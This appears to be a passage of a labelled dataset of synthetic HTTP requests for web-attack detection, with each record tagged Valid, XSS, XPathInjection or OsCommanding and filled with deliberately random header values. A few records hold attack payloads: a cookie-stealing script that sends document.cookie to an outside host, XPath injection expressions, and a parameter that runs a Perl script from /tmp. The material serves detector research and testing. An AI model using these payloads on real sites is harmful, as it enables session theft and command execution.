ETag: W/"mFqelyB_aK6x1TYMg"
Expect: dpMikS9s
From: 76ee@Emufnodv.uk
If-Modified-Since: Sat, 29 Jan 05 17:45:29 UTC
If-Unmodified-Since: Sat, 30 Dec 06 21:47:27 GMT
If-Match: *
If-None-Match: "eTY9QJVEJ1Ql@5WT3"
If-Range: Wed, 30 Jan 08 16:55:43 CET
Max-Forwards: 031
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM dHluaGlhcnVsc2FudWxBSWFEdWVlTHNyYWZtM3MyY2lSZWhvY2RobnI0bDFlbGl0
Authorization: ofbeli yiersi=52ieuui
Range: 79-3835,2558-9
Referer: /zATn/5ca0bpt.php
TE: chunked;q=0.7,trailers
Trailer: If-Range
User-Agent: Mozilla/2.5 (X11; U; Solaris 1.5; ea-er; rv:0.3.8) Gecko/90197156
UA-CPU: x86
UA-Disp: 439,238,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 599x133
Via: 1.0 www.iioaS.gif, t2onl/7.3 www.sriCi.js
Transfer-Encoding: gzip
Upgrade: lwl/7.6, pratqs/7.3
Warning: 376 www.ycezutrm.jpg "nens" "Mon, 03 Mar 08 23:13:28 GMT"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 05592727151
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16531
Start - Id: 2459
class: Valid
GET /fnnreikr/sisgka/rMNnGkCVe@fNmVN/eilhE5e/tcVBHVCh@BMY/qiJoK1T.V5StrTYu/AWhTN6pubint52/wsohhiOojittdcuxt9ub.gif? HTTP/1.1
Host: 241.12.100.132
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7;q=0.4, x-mac-chinesesimp;q=0.1, windows-1257;q=0.0
Accept-Encoding: 
Accept-Language: eE-nsO;q=0.9, saaer-neoo;q=0.2, eybeocs-nrAd2a;q=0.7, nAn2-eueucgtg;q=0.7
Cache-Control: max-stale=3
Client-ip: 65.8.54.25
Cookie: 78tHa9toss=sZu4Wi3vhV.;awyh8geaRps4=avbscripti r
Cookie2: $Version="76"
Date: Wed, 25 Apr 07 13:59:44 GMT
ETag: W/"RjwAwvT9IfNbL_LHZsRx"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Thu, 22 Mar 07 13:01:36 GMT
If-Unmodified-Since: Sat, 26 Sep 09 20:27:59 GMT
If-Match: "@y__usaBYoN_4Cv"
If-None-Match: "9_q4CvkG31kXZ5@qn"
If-Range: *
Max-Forwards: 9
MIME-Version: 6.6
Pragma: C='eInUnacm'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: Basic YWVObjpJY21lZWNlbg==
Range: 87817-,2898-
Referer: /hlxtpt4/geaaee/uwsthnfu/eSwSieH.swf
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 4.6; ii-se; rv:7.0.0) Gecko/63474956
UA-CPU: x86
UA-Disp: 097,5060,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 900x5240
Via: cnnrt/4.6 29.254.146.96, HTTP/5.0 187.83.249.97
Transfer-Encoding: aiEH
Upgrade: vpeeo/7.4
Warning: 416 www.pteq.html "largswoidrewai" "Wed, 11 Aug 04 24:11:21 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2459
Start - Id: 48289
class: XSS
PUT /e4dTYmLlPo0q9auTr/slA61I060y/v58wZM8y4d/-0nnph-i4KqIhome/rsss/y9fOUyoWj1qRq2S3uf/uPXFQsT44VEoTg6k8h/kKJTK7.sjZ.php4? HTTP/1.1
Content-Length: 310
Content-Language: etekstoM
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Host: 201.189.217.42
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, compress;q=0.4, identity;q=0.7
Accept-Language: *;q=0.8
Cache-Control: min-fresh=003
Cookie: Wx1J6J-=[\xC0][\xBC]script >[document.location.replace   ('http://www.trma.com/cgi-bin/chsimeta.cgi'+document.cookie);][\xC0][\xBC]/script    >
Date: Fri, 29 Feb 08 10:34:16 CET
If-Modified-Since: Fri, 16 Feb 07 18:22:22 GMT
If-Unmodified-Since: Wed, 24 Oct 07 15:35:55 UTC
If-None-Match: "9m0_LoxNvliY3S0J7g8P"
If-Range: Mon, 04 May 09 06:34:42 GMT
Authorization: xeti d1tk=esneec
Referer: http://www.eaxit.ch/ehi90ne/Eojeif/bqyws6ke.jsp
TE: gzip
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 8.2; 5i-l0; rv:5.8.0) Gecko/29016497
Via: 9.0 15.112.181.237, 8.8 www.beeet9c.jpg, 4.9 www.alhnsUut.jpg
Transfer-Encoding: identity
Upgrade: 4rr5/6.0
----: -----------------------------------------------

jcbN1h=:xjie  oh&IhyThXfs=5wuiNtsdeeymrns&sasrdaslaees=822335812&utsxThHh=lnkaaentxe&nhlelea=698419945&92etrlioagtdss6=tohlos&ba5yyoznpapd=1713388&TtoaSrerirtqr0s=arp~ o&9likeGallXXC=iun6tosasRhSaAF3ai&93AIq-I=eh6G@rWc7&2yqTG2CDNVzE=859&saoO=hEf]zcaee&1bgsound12T2-=&vn2o$edivnstnct&e0hw2et=oawoizA

End - Id: 48289
Start - Id: 1668
class: Valid
GET /u4enobegem/4HsizXI.asp?i7rTplchE=919&cmeenthHc=1392815&ghaMzmoa=da&el1=ibdrn%2Foet%5Cwek&lnq3=fNiUAm&Xof4L=5&nsyassr2sthJIdr=%3Eut&cahoRys5rEKl=xN&oitenruonrlwT4s=svuma&ldoed=i_K&mmLveeseiE=ib5HseOC3k&stuhid=+i HTTP/1.1
Host: www.Gdsls.biz:2
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: ls3ep-7tmr, 3r-bdd;q=0.8, Yuke-h;q=0.9, n2-ad7m
Cache-Control: no-store
Client-ip: 51.43.38.151
Cookie: ut0u= ct<7nxas;iEtoaoteFt=fyudksaee;uiozwa=71546109;cirewi=sn?Jsso;Agh9s=yrro;obyetusanatnd=sZWExVxu8b
Cookie2: $Version="708"
Date: Thu, 27 Jul 06 03:15:27 UTC
ETag: W/"gn5L@kHETqToPwgC"
Expect: 100-continue
From: irssarta@oehXEem.gov
If-Modified-Since: Tue, 20 Feb 07 16:30:46 CET
If-Unmodified-Since: Mon, 16 Mar 09 03:34:35 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Mar 06 01:03:08 CET
Max-Forwards: 8
MIME-Version: 9.8
Pragma: Rolo=Aoo5acC
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: Digest cnonce="dnaueie"
Range: 73-
Referer: http://oualvI9i.cz/ifrcrb/AsnvYn.asmx
TE: chunked;q=0.5,trailers
Trailer: Via
User-Agent: ksodeDrsi6seo
UA-CPU: x86
UA-Disp: 6991,2124,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3512x868
Via: FTP/9.5 www.ayeloa.tiff, din6Tb/2.9 www.ilotosle.png
Transfer-Encoding: deflate
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 918 www.oDrh8eht.gif:495 "6reee4ateqt1g" "Tue, 13 Dec 05 16:36:28 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1668
Start - Id: 48700
class: XPathInjection
POST /saaelIoeeeioey50XNa/iOMnKdo/2t/o@@qK-GiL15/nV33Ajcsd/ehnefeme0KttieeiotV/slaJ1/rniysrR/1Vg9lPgT1uhO5/rjdhce5para/ZweDVhGmiA.asp? HTTP/1.1
Content-Length: 380
Content-Language: noda,fts,aai5eu
Content-Encoding: compress
Content-Location: /ep4c8tre/ejpo/9kwapo.bin
Content-MD5: bXdyOW5lc2Ntcmlhcjlldw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Nov 08 10:11:10 GMT
Last-Modified: Sat, 10 Jan 09 12:23:06 GMT
Host: www.eqispiI.uk
Connection: ccbnj
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, gzip, identity;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="879"
Date: Tue, 26 Oct 04 24:26:03 GMT
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: Le0arhj=himlintn
From: wGpdumc@err6tcr.net
If-Modified-Since: Sat, 07 Aug 04 11:49:23 UTC
If-Unmodified-Since: Mon, 05 Jan 04 13:43:02 CET
If-Match: *
If-None-Match: "trprGR5jxF_KLyH2Pi_"
If-Range: Sat, 06 Aug 05 09:41:46 CET
Max-Forwards: 4233
MIME-Version: 7.4
Pragma: tdc6t8te='d'
Proxy-Authorization: NTLM YXp0ZHVqaXJzaGVzYWF3b2xtdGg1YUkybm9zYWNvcmVhc2w3
Authorization: Basic ZnBnd3Q6b25sZVg=
Range: 569156-2482
Referer: http://www.aoao.net/batear6/nueA/oXtHaoh/auhs/hlnrEhpt.mpeg
TE: deflate;q=0.3
Trailer: Expect
User-Agent: Mozilla/5.4 (X11; U; SunOS sun4u 7.7; la-0o; rv:7.1.5) Gecko/41014485
UA-CPU: MIPS
UA-Disp: 527,267,32
UA-Color: color8
UA-Pixels: 640x9904
Via: HTTP/0.7 16.101.160.147, 4.3 www.feteocs.css, HTTP/4.6 www.8nuTd.tiff:45862
Transfer-Encoding: deflate
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 243.139.91.251
X-Serial-Number: 70312364698710750668
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MiVKIB=ea5nTwootmSc&6fnhIrc5sln2kr=ls5MjVd&4ah=peb9S&sock_streamnetcat2vUphp.zDrform=yfxaEdne&wtaio=7&nxea=Lit1z usrwewqtl&Zqyt=mnGEsohi'   or    (i <     count(i2rya/child::text()) and  j     < count(Ftyet/child::comment())     and   k <   count(EAihg/child::*)    )  or    'ian'=   '  a0eynn'     or&rbcaeef=avg3w@4.

End - Id: 48700
Start - Id: 34386
class: Valid
POST /e7W4d.tEAtkpt6T6/sneeadttsrejeS0he/FToemorpsN/Nnatrcht/thretosrieoohsgah/phpO./M1RPBS0/itahtosarv5t6nN/eaIe6ttWna5eieo5oyju.png? HTTP/1.0
Content-Length: 300
Content-Language: sOtet,xidrann
Content-Encoding: deflate
Content-Location: http://www.ultS2r.it/fhont0h/efslts/eIEdm/rIiitoa.tar
Content-MD5: b2thbHNtQWZmaE9laXJsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Dec 04 21:04:50 UTC
Last-Modified: Wed, 31 Mar 04 16:42:59 UTC
Host: 150.209.17.6:83403
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 220.45.65.209
Cookie: lahfdNugsTltee=1lzktof
Cookie2: $Version="524"
Date: Fri, 08 Jul 05 03:05:56 GMT
ETag: W/"2XTGxtvNtQS07di_dd"
Expect: 100-continue
From: t2ao3Tim@5hsAsESuu.biz
If-Modified-Since: Tue, 06 Jun 06 22:02:15 CET
If-Unmodified-Since: Wed, 21 Jan 09 02:02:34 GMT
If-Match: *
If-None-Match: *
If-Range: "djhbINo4ig1k@IAY"
Max-Forwards: 5
MIME-Version: 7.0
Pragma: n=tde
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Digest opaque="imAi8eps"
Range: 369-272,49-76042
Referer: /zenU.pdf
TE: deflate,deflate
Trailer: Accept
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 6.2; Lm-4h; rv:2.3.9) Gecko/69923441
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4677x6242
Via: HTTP/2.0 www.rHvtaNa.htm:079, FTP/1.4 www.itarote.gif, FTP/6.5 www.oze8bp.js
Transfer-Encoding: deflate
Upgrade: yoida/3.5, iia1/9.7, Oerp/6.5, w9sl/0.2
Warning: 677 229.121.18.11 "Uhwoabeh" "Mon, 27 Aug 07 06:46:16 UTC"
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~

nlmrnee6qraoxyl=9&qsnot5=fo6;sjHcz&noi.1_fP=928501&o3kiOnaLxpEeal=bodyt?f&s7ans=96863372&isgoetsyornieyt=1e4Y2NG97P@&tteilraat87n=rr2ameee&i2fwpitopuai=seor?&ederee=tCtdIxmiEoHeO2d&Tuayxslznml=htx&4Ynaeoftstmt=ordocumentoodqtnuupdate&lnsofdhotx=@ie&Etrot4oarwktee=6mNese&ieB9rhouti=04926825

End - Id: 34386
Start - Id: 9092
class: Valid
GET /lna/uvnhy6t5la/@M/u2Lpasswd/kteoneeioalsiowHo/poQU/erhidiY8qp/dee4a/CAh7qi6gbdIrerf6st/tu8Zv.css? HTTP/1.0
Host: 99.58.221.107
Connection: keep-alive
Accept: audio/*;q=0.9, text/plain, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: h2-o;q=0.7, a1m-n, edoiN-la;q=0.5
Cache-Control: ssd4='1oharee'
Client-ip: 153.209.86.89
Cookie: 1anhieo=1@t;e8UthDh=0720
Cookie2: $Version="10"
Date: Tue, 27 Jun 06 18:00:15 GMT
ETag: "N-_Zl.xtPHZul@X7ViA"
Expect: atctr7=tetz0Vi;iurtb
From: MxDlrni@bvibt3iny0.com
If-Modified-Since: Thu, 17 Jan 08 24:26:17 CET
If-Unmodified-Since: Fri, 05 Oct 07 01:02:13 GMT
If-Match: *
If-None-Match: "hi5IQF2jbGV5gDmVX_"
If-Range: Mon, 07 Jul 08 03:40:48 GMT
Max-Forwards: 1361
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: Basic bnZ5YzpuY25s
Range: -74002,17-59,16-
Referer: /toudo4/wn77Ushw.asmx
TE: deflate,trailers,trailers
Trailer: Authorization
User-Agent: uqltttpu http://www.rdEe6isc.be
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9463x953
Via: 3.1 190.135.158.146:32, 4.1 www.lO4sm.gif
Transfer-Encoding: 3yai
Upgrade: Tedivm/2.5, ca3x9/5.8, stcsQ/8.5, azaee/6.9, hsei/4.7
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9092
Start - Id: 24090
class: Valid
GET /htn5omtnsnD/gxmf/ie6-Dd./o4x-.uW4wnr18/nsP8NgYm_9H-tt/MrNa0akh2-X.INorc.bin?rl=t%2Fhobject%27%7EM+&5WWJ9tmpEUhtpass=wtHtr5aihn&ed=bw1d&axfieotnngai92=4yrokbnrEan&smeainfee=nDzmoA8p&Agekot5sa9si3n=sseil0orfkR HTTP/1.1
Host: 180.199.225.153
Connection: ielfshTl
Accept: */*;q=0.7
Accept-Charset: cp-936, isiri-3342;q=0.5, windows-1255;q=0.1, x-mac-hebrew, x-mac-hebrew;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: grtEjani='neOrwgd'
Client-ip: 246.18.133.160
Cookie: lgehanoSjba=hPEheir?s?Idb5%fu;flmiotwNs=b4euh;4iam9ec=728;bdueisi34i=49497892;egUmtoorft=ehooaint7n2bdndeiE;4rJbrmf0fugz=&o
Cookie2: $Version="9"
Date: Tue, 21 Mar 06 03:42:59 UTC
ETag: "S44DbdJ0AYu-9WZWFH"
Expect: 100-continue
From: idehs@lb6ztam.biz
If-Modified-Since: Mon, 16 Oct 06 08:36:53 UTC
If-Unmodified-Since: Fri, 14 Dec 07 05:09:23 UTC
If-Match: *
If-None-Match: "a_@OJqy9iuQ1gza0NTum"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.7
Pragma: o6=y
Proxy-Authorization: NTLM YWVnaXR1bmVodWFvZWFVTUVpbHJocmw4ZWNzbHMyZHRkbnNyZnhz
Authorization: NTLM aGx1b2Fqd1VpZWVzeXU3aDZyb3JnaHJ1ZXMzZWF1bnB0c3RodEloMXUyNmFudGxh
Range: 8656-,477-859015,5910-
Referer: /esssdy1C/nmnsola/aerytgy/ciSd/uiplhe63.gif
TE: gzip,chunked,trailers
Trailer: Range
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 3.6; sa-3S; rv:0.6.0) Gecko/64038285
UA-CPU: 68000
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: 2.4 120.132.88.85, 5.9 www.s1Oexnf.jpg
Transfer-Encoding: compress
Upgrade: se7/3.4, xaa/8.7, srlhe/8.3
Warning: 178 126.189.30.55 "LptaNsntoaeessie6" "Sun, 23 Jul 06 12:48:27 CET"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 740529934868246
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24090
Start - Id: 3616
class: Valid
GET /%uQzvAhcSke4i/aAisGPxs/Yxp_AdXpositionRsamZPV/dQo7cs0.HL6LU/x8oR9HAQFiot5/lwrnrsdleon/xhsbvetemsracs2eyel/70vmNlM1bAFfZRqH/e.techobG/r9l1qWjL/TbK/b1o2_8Kgc.css?a7wh6nydrbr=d&iwttwa8feSfarht=nt6a HTTP/1.0
Host: www.fStzmne.fr
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 235.12.113.214
Cookie: iobs=rwlj9fI0;gtcamrhkcibr=ot5roebnths;livowsUneaelr8o=umjoptpstordlIp
Cookie2: $Version="746"
Date: Wed, 22 Feb 06 19:41:38 UTC
ETag: "MoQuwmd7-nzj0W.6gM3"
Expect: 100-continue
From: wunn@neo1eimeb.it
If-Modified-Since: Mon, 25 Feb 08 07:45:34 GMT
If-Unmodified-Since: Mon, 24 Aug 09 01:34:51 CET
If-Match: *
If-None-Match: "@0zQ.8oU3DD2.JGDUKK"
If-Range: Wed, 14 Apr 10 23:19:34 UTC
Max-Forwards: 5
MIME-Version: 7.2
Pragma: potatcr=k2seonU
Proxy-Authorization: NTLM dWE1ZGhVNXJuUmhhU2Vzd2ZyZkFvdHNhb1BUZWVtaGVybmV2NG9hbEw2MGNj
Authorization: Digest nonce
Range: -66041,943-,-24
Referer: http://nee52sr.cz/oiSei/gragouid/gotget/Etexe/owvIhri.pdf
TE: chunked,gzip;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.1 (Windows; U; WinNT 3.7; v7-en; rv:8.0.6) Gecko/08608389
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 945x5264
Via: atq/6.8 www.e4Mnee.tiff, ioStoY/4.0 www.Tyenner.jpg:07
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 794 www.dlUteCja.htm "intmTihasyncs7wBlnT" "Sun, 26 Feb 06 19:18:11 UTC"
X-Forwarded-For: 20.131.248.228
X-Serial-Number: 41732
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3616
Start - Id: 43318
class: OsCommanding
GET /inluiiOhOaAvfdoqfp0o/unionTGpi5R@9locationZnMO/lddisaailnbehtap/jI@OlqRKP9-93_Im.jsp?see=3222&vhbm=%2Fperl+++++%2Ftmp%2Fneveol.pl+-p6637&pMP_wJ7ShavingS=wiinpch&emm=ep&5esb6=hha%40tnBcCrhta1aes%24 HTTP/1.0
Host: www.siust9amh4.org
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip, identity;q=0.1, gzip
Accept-Language: *;q=0.8
Cache-Control: lrT=us
Client-ip: 170.237.233.234
Cookie: tet7oInoebuSs=yk4VgE;d9fs=aX0xpv7;toIfvs=imgej;fohiq=iimg we;lW=cbhnriTUwhwsiea;erg=jspMtPYsXf_
Cookie2: $Version="3"
Date: Tue, 09 Feb 10 05:40:56 GMT
ETag: "40ys2g9rXHb@kzHexja"
Expect: trl2g=ErI0fhr
From: eTnr@war0.be
If-Modified-Since: Wed, 29 Jun 05 21:59:07 UTC
If-Unmodified-Since: Mon, 31 Jan 05 03:53:13 UTC
If-Match: *
If-None-Match: "SqtapM8htxOM8Ikn"
If-Range: Fri, 01 Apr 05 02:36:54 CET
Max-Forwards: 5848
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: Digest qop=mokEmOt
Range: 2030-1
Referer: http://www.mlame.org/woLi/dhSrr/eDlae2.conf
TE: trailers,deflate,gzip
Trailer: Cache-Control
User-Agent: ctora6s83g0Mtiwe
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: merhn/0.4 35.246.112.144, HTTP/8.4 www.w2tA.gif, eh4i/3.6 68.90.179.145
Transfer-Encoding: tttnd
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 295019193
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43318
Start - Id: 16250
class: Valid
GET /alisbEerD/sowAfht.exe? HTTP/1.0
Host: 237.61.232.158:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: dly-Oleoee9, gti5E-1uFx2Nlx;q=0.3, attr-s7idofeo;q=0.3, snbpestn-LeHje;q=0.2, Se4r-kmc8ufet;q=0.1
Cache-Control: only-if-cached
Client-ip: 191.163.75.118
Cookie: bcT0=7;so1mDAtyti=4;dat5ttVc7=Eenkhmeu;Aaiieldtte=ere6safTwfI
Cookie2: $Version="29"
Date: Mon, 22 Nov 04 06:22:42 GMT
ETag: W/"CDOQXtE98ADoGyEbEW"
Expect: dlaR8Oyp=nka2o;eywn
From: Tcnle@algheiet.net
If-Modified-Since: Thu, 01 Jan 09 16:32:15 CET
If-Unmodified-Since: Fri, 30 Dec 05 09:05:56 GMT
If-Match: *
If-None-Match: "5l00K1x1Om.rj0a@MtVn"
If-Range: Tue, 08 Jul 08 14:05:33 GMT
Max-Forwards: 6616
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="sldh8rh"
Authorization: Basic Nmx0aWhpeTpFaW9nOQ==
Range: 820-,56899-18941
Referer: /qhEisSc/wwrttheb/cqql/tite.tar.gz
TE: gzip,chunked
Trailer: If-Match
User-Agent: uLooxesus6 (aBEQ5et; hWip9hve@Y; ofrexT; c1SrdiD6)
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2602x876
Via: 0.3 www.eMmdenr.tiff
Transfer-Encoding: identity
Upgrade: nysit/9.1, rnf/8.6, enSRLt/9.3, tIaii/5.9
Warning: 151 www.ot795bbe.tiff "yofcba7d9o" 
X-Forwarded-For: 136.200.162.240
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16250
Start - Id: 20964
class: Valid
GET /rSCEtZl2VtA-/ebbK.V4yltn/oe8f3o5cXuYsWLgH/wUi.JG6k_DbGsM-up/dxlw@9c4Zzy8@/aW8cnundeestLorj/F19Sn2D/c8sit2smmplSi/e1n/RfromjGHTw36DlibM%u/e4tSo1ra6Nuntg/su.asmx? HTTP/1.0
Host: www.ty9rec.ch:8764
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.5, iso-8859-3;q=0.9, ks_c_5601-1987;q=0.4, windows-1253, x-mac-roman;q=0.4
Accept-Encoding: identity, deflate
Accept-Language: 5hoii-mo;q=0.4, cn-7;q=0.7
Cache-Control: no-transform
Client-ip: 8.17.126.237
Cookie: evhehhatslef=87451014;Dp2Tiaxcc=64949468;ip-XNuANDE=3303114390
Cookie2: $Version="77"
Date: Wed, 13 May 09 22:50:41 UTC
ETag: W/".h4X9.4Pi3kK62MD6-Y"
Expect: 100-continue
From: stnsist@ee8nh.de
If-Modified-Since: Thu, 15 May 08 14:09:19 UTC
If-Unmodified-Since: Wed, 26 Jul 06 05:25:30 CET
If-Match: "iNW4_@jvS-RDf20e5_E"
If-None-Match: *
If-Range: "Xh-fbEaM3B4psrg2NM"
Max-Forwards: 35
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://trntegwe.gov/aaae/hicet/u5e6b.aspx
Authorization: Digest qop=auth
Range: 225798-,299422-
Referer: http://istsp.be/nipor/tVava/Tat2et/evetal/ijprTooQ.mpeg
TE: trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: C9tttogyh4 (hvL_u5)
UA-CPU: 68000
UA-Disp: 3276,4561,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 212x4647
Via: 1.4 www.iytoh.png:876, 6.5 www.ohte.tiff
Transfer-Encoding: compress
Upgrade: tknsdI/6.1, bao9sk/7.3, wfso/2.7, lrm/1.0
Warning: 818 39.101.24.238 "Ei4etc3nfbsi2nwj" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 175416
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20964
Start - Id: 30573
class: Valid
GET /QjYetmpvbSgTXicz/lts9KhZRB2/ppzHe6.exe?td9l0er8p=likee&dNpm=8gw&ap=4%2Bbrsaarr+%26aefAscript&g2=e88uYcdlC&uno24airQims=dctcolpeizau&stsaisjdiD=eZIM8D-BgoM&AiCKwindow.openuEV4=19 HTTP/1.1
Host: 161.37.167.133
Connection: keep-alive
Accept: video/quicktime, application/rtf;q=0.8, application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 61.132.5.63
Cookie: apir=Eaihsimh;lcN2KV=12548153;h8CfISZhChtpass=hsss
Cookie2: $Version="930"
Date: Mon, 12 Jul 04 23:00:35 UTC
ETag: "85sRP9tymf1-l02eG@9"
Expect: 100-continue
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sat, 10 May 08 04:22:05 GMT
If-Unmodified-Since: Thu, 12 Oct 06 12:54:38 UTC
If-Match: *
If-None-Match: "ro.8O0t.r1sWivDq"
If-Range: Mon, 05 Dec 05 23:19:23 UTC
Max-Forwards: 685
MIME-Version: 9.2
Pragma: Ssdlx=iwSstres
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: ocpst nrGe=Sflu
Range: -6,40780-7
Referer: /ystkyn.exe
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: i9sC7ztT http://www.heeeo.it
UA-CPU: 68000
UA-Disp: 537,7746,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0605x4751
Via: HTTP/8.2 49.89.204.218, 9.2 www.Oon1.png, 8.5 www.roeADzh.jpeg
Transfer-Encoding: identity
Upgrade: yseieo/2.3
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 215.132.242.147
X-Serial-Number: 64363233
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30573
Start - Id: 35827
class: XPathInjection
GET /a7tehprOthlRtcEet/axG73NR/lohdpEe/uxQOd.gif?Inunvi=480&sw=hssepaoOto7anelus&FWpM7updatewEJDII=2uGdle%29+&cli2onbeofte1sN=emaf%3Bs%7CEstdinstdinsealln6z%7E%2F&odadaUnsuiSnqEg=damail&atgir1aif9rpse=202+or++++roe%2F52or%2FijSn0t%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D219%5D++++or+++80150%3D&Eis=1&nN7ora=%27ai&rdndu7nlen=63072749&tnqie=797 HTTP/1.0
Host: www.cddmgS.com:80
Connection: keep-alive
Accept: video/*;q=0.2, video/quicktime;q=0.3, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 139.91.97.81
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="2"
Date: Tue, 03 Mar 09 08:59:46 UTC
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Mon, 26 Jul 04 03:42:54 CET
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: "rJlwgPm0OVPJPWl0h"
If-None-Match: *
If-Range: *
Max-Forwards: 51
